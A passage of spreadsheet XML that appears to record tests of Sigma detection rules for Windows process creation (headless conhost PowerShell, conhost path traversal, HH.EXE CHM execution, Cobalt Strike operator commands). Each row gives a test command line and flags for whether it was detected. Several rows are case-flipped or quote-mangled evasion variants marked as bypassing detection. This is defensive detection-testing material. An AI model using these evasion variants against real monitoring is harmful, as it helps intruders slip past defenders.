        <v>1</v>
      </c>
    </row>
    <row r="2403" ht="15.75" customHeight="1" s="42">
      <c r="A2403" s="43" t="n"/>
      <c r="B2403" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2403" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2403" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2403" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe -"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2403" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2403" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2403" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2403" s="44" t="n"/>
      <c r="J2403" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2403" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2404" ht="15.75" customHeight="1" s="42">
      <c r="A2404" s="43" t="n"/>
      <c r="B2404" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2404" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2404" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2404" s="44" t="inlineStr">
        <is>
          <t>conhost.exe /"-headless" pwsh.exe -COmmAnd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2404" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2404" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2404" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2404" s="44" t="n"/>
      <c r="J2404" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2404" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2405" ht="15.75" customHeight="1" s="42">
      <c r="A2405" s="43" t="n"/>
      <c r="B2405" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2405" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2405" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2405" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --headless C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2405" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2405" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2405" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2405" s="4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2405" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2405" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2406" ht="15.75" customHeight="1" s="42">
      <c r="A2406" s="43" t="n"/>
      <c r="B2406" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2406" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2406" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2406" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe -"-headless" C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2406" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2406" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2406" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2406" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2406" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2406" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2407" ht="15.75" customHeight="1" s="42">
      <c r="A2407" s="43" t="n"/>
      <c r="B2407" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2407" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2407" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2407" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --hEADlEsS C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2407" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2407" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2407" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2407" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2407" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2407" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2408" ht="15.75" customHeight="1" s="42">
      <c r="A2408" s="43" t="n"/>
      <c r="B2408" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2408" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2408" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2408" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe /"-headless" C:\Temp\sys.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2408" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2408" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2408" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2408" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2408" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2408" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2409" ht="15.75" customHeight="1" s="42">
      <c r="A2409" s="43" t="n"/>
      <c r="B2409" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2409" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2409" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2409" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --HeADLeSS C:\Temp\sys.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2409" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2409" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2409" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2409" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2409" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2409" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2410" ht="15.75" customHeight="1" s="42">
      <c r="A2410" s="43" t="n"/>
      <c r="B2410" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2410" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2410" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2410" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --hEAdlESS C:\Temp\sys.exe -CommAnd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F2410" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2410" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2410" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2410" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2410" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2410" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2411" ht="15.75" customHeight="1" s="42">
      <c r="A2411" s="43" t="n"/>
      <c r="B2411" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_path_traversal</t>
        </is>
      </c>
      <c r="C2411" s="44" t="inlineStr">
        <is>
          <t>Conhost.exe CommandLine Path Traversal</t>
        </is>
      </c>
      <c r="D2411" s="44" t="inlineStr">
        <is>
          <t>ee5e119b-1f75-4b34-add8-3be976961e39</t>
        </is>
      </c>
      <c r="E2411" s="44" t="inlineStr">
        <is>
          <t>conhost.exe "conhost.exe" \..\..\..\..\windows\system32\calc.exe</t>
        </is>
      </c>
      <c r="F2411" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2411" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2411" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2411" s="44" t="inlineStr">
        <is>
          <t>Uncommon Child Process Of Conhost.EXE (7dc2dedd-7603-461a-bc13-15803d132355);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J2411" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2411" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2412" ht="15.75" customHeight="1" s="42">
      <c r="A2412" s="43" t="n"/>
      <c r="B2412" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2412" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2412" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2412" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F2412" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2412" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2412" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2412" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2412" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2412" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2413" ht="15.75" customHeight="1" s="42">
      <c r="A2413" s="43" t="n"/>
      <c r="B2413" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2413" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2413" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2413" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F2413" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2413" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2413" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2413" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2413" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2413" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2414" ht="15.75" customHeight="1" s="42">
      <c r="A2414" s="43" t="n"/>
      <c r="B2414" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2414" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2414" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2414" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F2414" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2414" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2414" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2414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414" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2414" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2415" ht="15.75" customHeight="1" s="42">
      <c r="A2415" s="43" t="n"/>
      <c r="B2415" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2415" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2415" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2415" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F2415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2415" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2415" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2415" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2415" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2416" ht="15.75" customHeight="1" s="42">
      <c r="A2416" s="43" t="n"/>
      <c r="B2416" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2416" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2416" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2416" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F2416" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2416" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2416" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2416" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2416" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2416" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2417" ht="15.75" customHeight="1" s="42">
      <c r="A2417" s="43" t="n"/>
      <c r="B2417" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2417" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2417" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2417" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2417" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2417" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2417" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2417" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2417" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2417" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2418" ht="15.75" customHeight="1" s="42">
      <c r="A2418" s="43" t="n"/>
      <c r="B2418" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2418" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2418" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2418" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2418" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2418" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2418" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2418" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2418" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2418" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2419" ht="15.75" customHeight="1" s="42">
      <c r="A2419" s="43" t="n"/>
      <c r="B2419" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2419" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2419" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2419" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2419" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2419" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2419" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2419" s="43" t="n"/>
      <c r="J2419" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2419" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2420" ht="15.75" customHeight="1" s="42">
      <c r="A2420" s="43" t="n"/>
      <c r="B2420" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2420" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2420" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2420" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2420" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2420" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2420" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2420" s="43" t="n"/>
      <c r="J2420" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2420" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2421" ht="15.75" customHeight="1" s="42">
      <c r="A2421" s="43" t="n"/>
      <c r="B2421" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2421" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2421" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2421" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F2421" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2421" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2421" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2421" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2421" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2421" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2422" ht="15.75" customHeight="1" s="42">
      <c r="A2422" s="43" t="n"/>
      <c r="B2422" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2422" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2422" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2422" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F2422" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2422" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2422" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2422" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2422" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2422" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2423" ht="15.75" customHeight="1" s="42">
      <c r="A2423" s="43" t="n"/>
      <c r="B2423" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2423" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2423" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2423" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F2423" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2423" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2423" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2423" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2423" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2423" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2424" ht="15.75" customHeight="1" s="42">
      <c r="A2424" s="43" t="n"/>
      <c r="B2424" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2424" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2424" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2424" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F2424" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2424" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2424" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2424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424" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2424" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2425" ht="15.75" customHeight="1" s="42">
      <c r="A2425" s="43" t="n"/>
      <c r="B2425" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C2425" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D2425" s="44" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E2425" s="44" t="inlineStr">
        <is>
          <t>%COMSPEC% /"c" make_token</t>
        </is>
      </c>
      <c r="F2425" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2425" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2425" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2425" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands (647c7b9e-d784-4fda-b9a0-45c565a7b729); Operator Bloopers Cobalt Strike Commands (647c7b9e-d784-4fda-b9a0-45c565a7b729)</t>
        </is>
      </c>
      <c r="J2425" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2425" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2426" ht="15.75" customHeight="1" s="42">
      <c r="A2426" s="43" t="n"/>
      <c r="B2426" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C2426" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D2426" s="44" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E2426" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\SysWOW64\cmd.exe -"c" echo logonpasswords</t>
        </is>
      </c>
      <c r="F2426" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2426" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2426" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2426" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands (647c7b9e-d784-4fda-b9a0-45c565a7b729)</t>
        </is>
      </c>
      <c r="J2426" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2426" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2427" ht="15.75" customHeight="1" s="42">
      <c r="A2427" s="43" t="n"/>
      <c r="B2427" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C2427" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D2427" s="44" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E2427" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\SysWOW64\cmd.exe /"c" echo logonpasswords</t>
        </is>
      </c>
      <c r="F2427" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2427" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2427" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2427" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands (647c7b9e-d784-4fda-b9a0-45c565a7b729)</t>
        </is>
      </c>
      <c r="J2427" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2427" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2428" ht="15.75" customHeight="1" s="42">
      <c r="A2428" s="43" t="n"/>
      <c r="B2428" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C2428" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D2428" s="44" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E2428" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\SysWOW64\cmd.exe /C echo logonpasswords</t>
        </is>
      </c>
      <c r="F2428" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2428" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2428" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2428" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands (647c7b9e-d784-4fda-b9a0-45c565a7b729)</t>
        </is>
      </c>
      <c r="J2428" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2428" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2429" ht="15.75" customHeight="1" s="42">
      <c r="A2429" s="43" t="n"/>
      <c r="B2429" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C2429" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D2429" s="44" t="inlineStr">
        <is>
